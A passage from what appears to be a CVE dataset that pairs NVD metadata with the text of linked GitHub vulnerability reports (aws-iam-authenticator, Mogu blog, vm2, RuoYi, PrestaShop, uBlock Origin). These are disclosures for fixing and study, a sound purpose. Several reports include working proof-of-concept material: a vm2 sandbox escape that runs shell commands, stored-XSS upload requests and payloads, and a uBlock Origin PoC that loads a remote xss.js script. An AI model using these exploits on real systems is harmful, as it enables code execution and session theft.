`flask.send_file` calls with `flask.send_from_directory` calls. ## Common Vulnerability Scoring System Vector The attack can be carried over the network. A complex non-standard configuration or a specialized condition is not required for the attack to be successfully conducted. There is no user interaction required for successful execution. The attack can affect components outside the scope of the target module. The attack can be used to gain access to confidential files like passwords, login credentials and other secrets. It cannot be directly used to affect a change on a system resource. Hence has limited to no impact on integrity. Using this attack vector a attacker may make multiple requests for accessing huge files such as a database. This can lead to a partial system denial service. However, the impact on availability is quite low in this case. Taking this account an appropriate CVSS v3.1 vector would be (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L)[https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L&version=3.1] This gives it a base score of 9.3/10 and a severity rating of critical. ## References * [OWASP Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal) * github/securitylab#669 ### This bug was found using *[CodeQL by Github](https://codeql.github.com/)*
Security Vulnerability Found
https://api.github.com/repos/scorelab/OpenMF/issues/262/comments
0
2022-05-03T12:25:30Z
2022-05-03T12:27:48Z
https://github.com/scorelab/OpenMF/issues/262
1,224,030,169
262
3,830
CVE-2022-2385
2022-07-12T19:15:08.487
A security issue was discovered in aws-iam-authenticator where an allow-listed IAM identity may be able to modify their username and escalate privileges.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kubernetes-sigs/aws-iam-authenticator/issues/472" }, { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/a/kubernetes.io/g/dev/c/EMxHpU-1ZYs" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kubernetes-sigs/aws-iam-authenticator/issues/472" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/a/kubernetes.io/g/dev/c/EMxHpU-1ZYs" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:aws-iam-authenticator:*:*:*:*:*:kubernetes:*:*", "matchCriteriaId": "61C7DCDF-228A-41D4-9336-B6E757616B72", "versionEndExcluding": "0.5.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "0.5.2", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/kubernetes-sigs/aws-iam-authenticator/issues/472
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kubernetes-sigs", "aws-iam-authenticator" ]
CVSS Rating: [High](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) A security issue was discovered in aws-iam-authenticator where an allow-listed IAM identity may be able to modify their username and escalate privileges. This issue has been rated **high** (https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N), and assigned CVE-2022-2385 ### Am I vulnerable? Users are only affected if they use the AccessKeyID template parameter to construct a username and provide different levels of access based on the username. #### Affected Versions - aws-iam-authenticator v0.5.2 - v0.5.8 ### How do I mitigate this vulnerability? Upgrading to v0.5.9 mitigates this vulnerability. Prior to upgrading, this vulnerability can be mitigated by not using the `{{AccessKeyID}}` template value to construct usernames. #### Fixed Versions This issue was fixed in #469 - aws-iam-authenticator v0.5.9 ### Detection This issue affected the logged identity, and is not discernible from valid requests. #### Acknowledgements This vulnerability was reported by Gafnit Amiga from Lightspin. /area security /kind bug /committee security-response /label official-cve-feed
CVE-2022-2385: AccessKeyID validation bypass
https://api.github.com/repos/kubernetes-sigs/aws-iam-authenticator/issues/472/comments
5
2022-07-11T16:15:16Z
2022-07-12T18:23:35Z
https://github.com/kubernetes-sigs/aws-iam-authenticator/issues/472
1,300,932,370
472
3,831
CVE-2022-30517
2022-07-12T23:15:12.037
Mogu blog 5.2 is vulnerable to Cross Site Scripting (XSS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/moxi624/mogu_blog_v2/issues/65" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/moxi624/mogu_blog_v2/issues/65" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mogublog_project:mogublog:5.2:*:*:*:*:*:*:*", "matchCriteriaId": "BAA6E8F8-A88C-4E75-A0F3-9597FBB3B034", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/moxi624/mogu_blog_v2/issues/65
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "moxi624", "mogu_blog_v2" ]
Using mogu2021:mogu2021 to log in the Mogu blog. http://demoweb.moguit.cn/ ![1 0](https://user-images.githubusercontent.com/47633517/167292671-2a4c815b-d59d-46d8-92f0-b980bc7cd173.png) ![1 1](https://user-images.githubusercontent.com/47633517/167292701-9f57dae7-681b-48a0-97ad-e4796bada332.png) Choose User Center > User Avatar > Image ![1 2](https://user-images.githubusercontent.com/47633517/167292765-805459f0-4bad-4703-94be-7d92e16077b0.png) ![2](https://user-images.githubusercontent.com/47633517/167292829-dd2618ca-b17d-4186-8804-b08f7e092869.png) At this point, use the burp suite to capture the request packet. Use the Repeater module in BurpSuite. Try to change the file contents in the request package to the XSS payload and try to change the file name to the HTML suffix. You can see the successful upload and the file path in the response package. ![3](https://user-images.githubusercontent.com/47633517/167292973-deffcdfc-f6a0-4687-b637-a9c3e5881100.png) Open your browser to access the HTML file you just uploaded ![4](https://user-images.githubusercontent.com/47633517/167293019-5fee2c5b-4a92-4046-8d31-709774ae9533.png)
Mogu blog has a vulnerability to upload arbitrary files
https://api.github.com/repos/moxi624/mogu_blog_v2/issues/65/comments
2
2022-05-08T11:03:25Z
2022-06-05T08:47:22Z
https://github.com/moxi624/mogu_blog_v2/issues/65
1,228,858,146
65
3,832
CVE-2019-10761
2022-07-13T09:15:08.213
This affects the package vm2 before 3.6.11. It is possible to trigger a RangeError exception from the host rather than the "sandboxed" context by reaching the stack call limit with an infinite recursion. The returned object is then used to reference the mainModule property of the host code running the script allowing it to spawn a child_process and execute arbitrary code.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 8.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.7, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 8.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/commit/4b22d704e4794af63a5a2d633385fd20948f6f90" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/issues/197" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-VM2-473188" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/commit/4b22d704e4794af63a5a2d633385fd20948f6f90" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/issues/197" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-VM2-473188" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "E1C137CC-088D-4998-BB3A-DD81B2CCCE79", "versionEndExcluding": "3.6.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "674" ]
674
https://github.com/patriksimek/vm2/issues/197
[ "Exploit", "Third Party Advisory" ]
github.com
[ "patriksimek", "vm2" ]
It is possible to almost anywhere generate a RangeError: Maximum call stack size exceeded. Sometimes the RangeError will be a host RangeError which is not Contextified. I tried to make the code as stable as possible. ```JS "use strict"; const {VM} = require('vm2'); const untrusted = ` const f = Buffer.prototype.write; const ft = { length: 10, utf8Write(){ } } function r(i){ var x = 0; try{ x = r(i); }catch(e){} if(typeof(x)!=='number') return x; if(x!==i) return x+1; try{ f.call(ft); }catch(e){ return e; } return null; } var i=1; while(1){ try{ i=r(i).constructor.constructor("return process")(); break; }catch(x){ i++; } } i.mainModule.require("child_process").execSync("whoami").toString() `; try{ console.log(new VM().run(untrusted)); }catch(x){ console.log(x); } ``` I used 11.8.0.
Breakout in v3.6.10 via Maximum call stack size exceeded RangeError
https://api.github.com/repos/patriksimek/vm2/issues/197/comments
3
2019-04-07T08:21:39Z
2019-12-09T22:43:50Z
https://github.com/patriksimek/vm2/issues/197
430,118,407
197
3,833
CVE-2022-32065
2022-07-13T15:15:10.707
An arbitrary file upload vulnerability in the background management module of RuoYi v4.7.3 and below allows attackers to execute arbitrary code via a crafted HTML file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://gitee.com/y_project/RuoYi/commit/d8b2a9a905fb750fa60e2400238cf4750a77c5e6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://gitee.com/y_project/RuoYi/issues/I57IME" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/yangzongzhuan/RuoYi/commit/d8b2a9a905fb750fa60e2400238cf4750a77c5e6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yangzongzhuan/RuoYi/issues/118" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://gitee.com/y_project/RuoYi/commit/d8b2a9a905fb750fa60e2400238cf4750a77c5e6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://gitee.com/y_project/RuoYi/issues/I57IME" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/yangzongzhuan/RuoYi/commit/d8b2a9a905fb750fa60e2400238cf4750a77c5e6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yangzongzhuan/RuoYi/issues/118" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ruoyi:ruoyi:*:*:*:*:*:*:*:*", "matchCriteriaId": "1501E3A5-4A4F-4D50-B99A-D553D98C20B2", "versionEndExcluding": null, "versionEndIncluding": "4.7.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/yangzongzhuan/RuoYi/issues/118
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yangzongzhuan", "RuoYi" ]
Vulnerability disclosure Vulnerability title: The html file can be uploaded where the avatar is uploaded, and its content not be filtered, which resulting in stored XSS in Ruoyi cms Product: https://github.com/yangzongzhuan/RuoYi Affected Versions: v4.7.3(the lastest vesion) Discovery time: 2022.5.16 Found by: solarpeng502 Exploit sence: The System allows multiple users to log in. If a user is granted user management rights, he can insert a malicious xss payload on user management page, so that all users with this permission can access and trigger an xss attack Analysis report: 1. If you are not Chinese,please change the language into the English through Browser translation plugin such as Google. 2. After deployment, enter the background management page ![image](https://user-images.githubusercontent.com/37793491/168499901-73892939-703c-4a90-b056-1187e5ae6317.png) 3. Click the avatar into the personal center ![image](https://user-images.githubusercontent.com/37793491/168499915-de2d2b64-09f4-4157-9ade-cf6aaf431845.png) 4. Click the "modify avatar",and upload a normal image,the click OK button ![image](https://user-images.githubusercontent.com/37793491/168499926-dedd76ea-ae5a-4738-b31a-cf23ca107408.png) ![image](https://user-images.githubusercontent.com/37793491/168499991-7166d875-2917-4a3a-b53c-26b684f06b9f.png) 5. Intercept the request package with a packet capture tool such as burp, change the file suffix to html, and change the content with xss payload such as "<script>alert(1)</script>,then pass the request,and the response shows "{"msg":"操作成功","code":0}",which means upload success ![image](https://user-images.githubusercontent.com/37793491/168500000-f645e6ba-cfc6-4997-bfb2-4b74ebe6c1cf.png) ![image](https://user-images.githubusercontent.com/37793491/168500016-12a176a7-5ed4-4326-aa76-b3325c35b6d7.png) ![image](https://user-images.githubusercontent.com/37793491/168500028-9694108e-0a67-4232-ac9f-50853c9bc29f.png) 6. Refresh the index page,start burp,and then click the avatar again,the burp will intercept the xss html that we upload ![image](https://user-images.githubusercontent.com/37793491/168500037-3012e7bd-a695-4faf-8c5e-4f0de74dccd8.png) ![image](https://user-images.githubusercontent.com/37793491/168500049-93551ebd-8bec-41dc-bbe5-45360da55677.png) 7. Copy the html url,and then send to the other users using Ruoyi cms,if they click,the xss attack is triggered ![image](https://user-images.githubusercontent.com/37793491/168500068-1abf6348-2451-4f87-9379-17d3caf6f861.png) POC: POST /system/user/profile/updateAvatar HTTP/1.1 Host: mysite.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------21781164112778176297556867959 Content-Length: 249 Origin: http://mysite.com/ Connection: close Referer: http://mysite.com/system/user/profile/avatar Cookie: Your cookies -----------------------------21781164112778176297556867959 Content-Disposition: form-data; name="avatarfile"; filename="blob.html" Content-Type: image/png <script>alert(1)</script> -----------------------------21781164112778176297556867959-- Fixes: The backend should verify the file suffix, and do not allow html file upload;or check the content in Html file that filter xss payloads.
Vulnerability: The html file can be uploaded where the avatar is uploaded, and its content not be filtered, which resulting in stored XSS in Ruoyi cms
https://api.github.com/repos/yangzongzhuan/RuoYi/issues/118/comments
1
2022-05-15T23:58:57Z
2022-07-12T09:45:58Z
https://github.com/yangzongzhuan/RuoYi/issues/118
1,236,468,032
118
3,834
CVE-2020-21967
2022-07-13T20:15:08.030
File upload vulnerability in the Catalog feature in Prestashop 1.7.6.7 allows remote attackers to run arbitrary code via the add new file page.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/167742/PrestaShop-1.7.6.7-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PrestaShop/PrestaShop/issues/20306" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/167742/PrestaShop-1.7.6.7-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PrestaShop/PrestaShop/issues/20306" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:prestashop:prestashop:1.7.6.7:*:*:*:*:*:*:*", "matchCriteriaId": "7B8C99EA-5A63-4404-AE10-5E4B4652F371", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/PrestaShop/PrestaShop/issues/20306
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "PrestaShop", "PrestaShop" ]
<!-- **************************** DO NOT disclose security issues here, contact security@prestashop.com instead! **************************** --> An issue is discovered in PrestaShop version 1.7.6.7 under the Catelog feature when using the file-upload functionality for uploading the Files for various products. This issue exists because it fails to implement file content checks and improperly handles the output, resulting in cross-site scripting attack that leads to cookie stealing or malicious actions. #### Steps to Reproduce 1. Go to Catelog feature 2. Click on File component and add the details accordingly. 3. Create a file with .html extension and enter the payload <script>alert('XSS!!');</script>within it. (Here its, uplod.html) 4. Upload the file 5. Login as customer and click on the file uploaded for the particular product. 6. You can see the XSS payload gets executed. CVSS Score: CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N ![SS1](https://user-images.githubusercontent.com/49667959/88317314-b792ca00-cd36-11ea-8011-e10898092c67.PNG) ![SS2](https://user-images.githubusercontent.com/49667959/88317319-b9f52400-cd36-11ea-9819-9b6714187828.PNG) ![SS3](https://user-images.githubusercontent.com/49667959/88317322-bb265100-cd36-11ea-8c44-06d0bf73f226.PNG)
Cross Site Scripting Issue in PrestaShop Using File Upload Functionality
https://api.github.com/repos/PrestaShop/PrestaShop/issues/20306/comments
3
2020-07-23T17:29:20Z
2020-07-24T07:51:28Z
https://github.com/PrestaShop/PrestaShop/issues/20306
664,648,405
20,306
3,835
CVE-2022-32308
2022-07-13T20:15:08.110
Cross Site Scripting (XSS) vulnerability in uBlock Origin extension before 1.41.1 allows remote attackers to run arbitrary code via a spoofed 'MessageSender.url' to the browser renderer process.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/uBlockOrigin/uBlock-issues/issues/1992" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/uBlockOrigin/uBlock-issues/issues/1992" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ublock_origin_project:ublock_origin:*:*:*:*:*:*:*:*", "matchCriteriaId": "E19CA144-D108-468C-A361-3BA22E3BCB18", "versionEndExcluding": "1.41.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/uBlockOrigin/uBlock-issues/issues/1992
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "uBlockOrigin", "uBlock-issues" ]
### Description Email received at `ubo-security at raymondhill.net` on 2022-02-17: > Hi, > > I'd like to report a security vulnerability in the uBlock Origin extension. > > A compromised renderer process of Chrome is able to spoof the URL of a messaging port and send privileged messages. > > A compromised renderer process can spoof the 'MessageSender.url' in a chrome.runtime.onConnect listener[1][2]. 'vAPI.messaging.onPortConnect' uses 'sender.url' to determine whether the port is privileged (https://github.com/gorhill/uBlock/blob/3154ed1bac227e4bc683c919d8d10bd01c9f8bb6/platform/common/vapi-background.js#L857-L861). As a result, a compromised renderer can spoof the URL to an extension URL and perform sensitive actions. > > For instance, it can set 'userResourcesLocation' and add a custom filter to perform XSS. > > [1] https://chromium.googlesource.com/chromium/src/+/refs/heads/main/docs/security/compromised-renderers.md > [2] https://developer.chrome.com/docs/extensions/mv3/security/#content_scripts > > * Affected browser versions > All Chrome including 98 (stable) to 101 > > * PoC > 1. To simulate a compromised renderer, the following patch can be applied to Chromium: > ```patch > diff --git a/extensions/renderer/ipc_message_sender.cc b/extensions/renderer/ipc_message_sender.cc > index 5e25676cbcb..5e7436c28d6 100644 > --- a/extensions/renderer/ipc_message_sender.cc > +++ b/extensions/renderer/ipc_message_sender.cc > @@ -154,6 +154,9 @@ class MainThreadIPCMessageSender : public IPCMessageSender { > } > info.target_id = *target.extension_id; > info.source_url = script_context->url(); > + if (info.source_url.host() == "example.com") { > + info.source_url = GURL("chrome-extension://cjpalhdlnbpafiamejdnhcphjbkeiagm/"); > + } > > TRACE_RENDERER_EXTENSION_EVENT( > "MainThreadIPCMessageSender::SendOpenMessageChannel/extension", > ``` > or the following patch to the uBlock Origin extension: > ```patch > diff --git a/platform/common/vapi-background.js b/platform/common/vapi-background.js > index 0d3cc584e..90e7c7089 100644 > --- a/platform/common/vapi-background.js > +++ b/platform/common/vapi-background.js > @@ -855,7 +855,11 @@ vAPI.messaging = { > ); > const portDetails = { port }; > const sender = port.sender; > - const { tab, url } = sender; > + const { tab } = sender; > + let { url } = sender; > + if (url.indexOf("example.com") !== -1) { > + url = "chrome-extension://cjpalhdlnbpafiamejdnhcphjbkeiagm/"; > + } > portDetails.frameId = sender.frameId; > portDetails.frameURL = url; > portDetails.privileged = url.startsWith(this.PRIVILEGED_URL); > ``` > 2. Install uBlock Origin extension (https://chrome.google.com/webstore/detail/ublock-origin/cjpalhdlnbpafiamejdnhcphjbkeiagm). > 3. Visit `https://example.com` and open DevTools. > 4. To simulate a compromised renderer, change the JavaScript context to uBlock Origin and run `'await vAPI.messaging.send("dashboard", {what: "writeHiddenSettings", content: "userResourcesLocation https://gist.githubusercontent.com/ylemkimon/c722fc2dc8510734a169d272aa116a6a/raw/1b04a075104aa27dbcaae13bd7e0ba0ef0f633ab/xss.js"}); await vAPI.messaging.send("dashboard", {what: "createUserFilter", filters: "google.com##+js(xss.js)"});'`. > 5. Visit `https://google.com` and observe that an alert with the 'document.domain' is shown. > > * Proposed fix > Use 'MessageSender.origin' (https://developer.chrome.com/docs/extensions/reference/runtime/#property-MessageSender-origin) if available (Chrome 80+), which is not spoofable[1]. > > Best regards, > Young Min Kim > > —— > Young Min Kim > CompSec Lab, Seoul National University ### uBlock Origin version 1.40.2 ### Browser name and version All Chrome including 98 (stable) to 101 ### Operating System and version Irrelevant
Use unspoofable Messenger.origin to determine privilege level of ports
https://api.github.com/repos/uBlockOrigin/uBlock-issues/issues/1992/comments
1
2022-02-17T23:03:39Z
2022-03-03T13:45:44Z
https://github.com/uBlockOrigin/uBlock-issues/issues/1992
1,142,031,666
1,992
3,836
CVE-2022-32117
2022-07-13T21:15:08.123
Jerryscript v2.4.0 was discovered to contain a stack buffer overflow via the function jerryx_print_unhandled_exception in /util/print.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5008" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5008" } ]
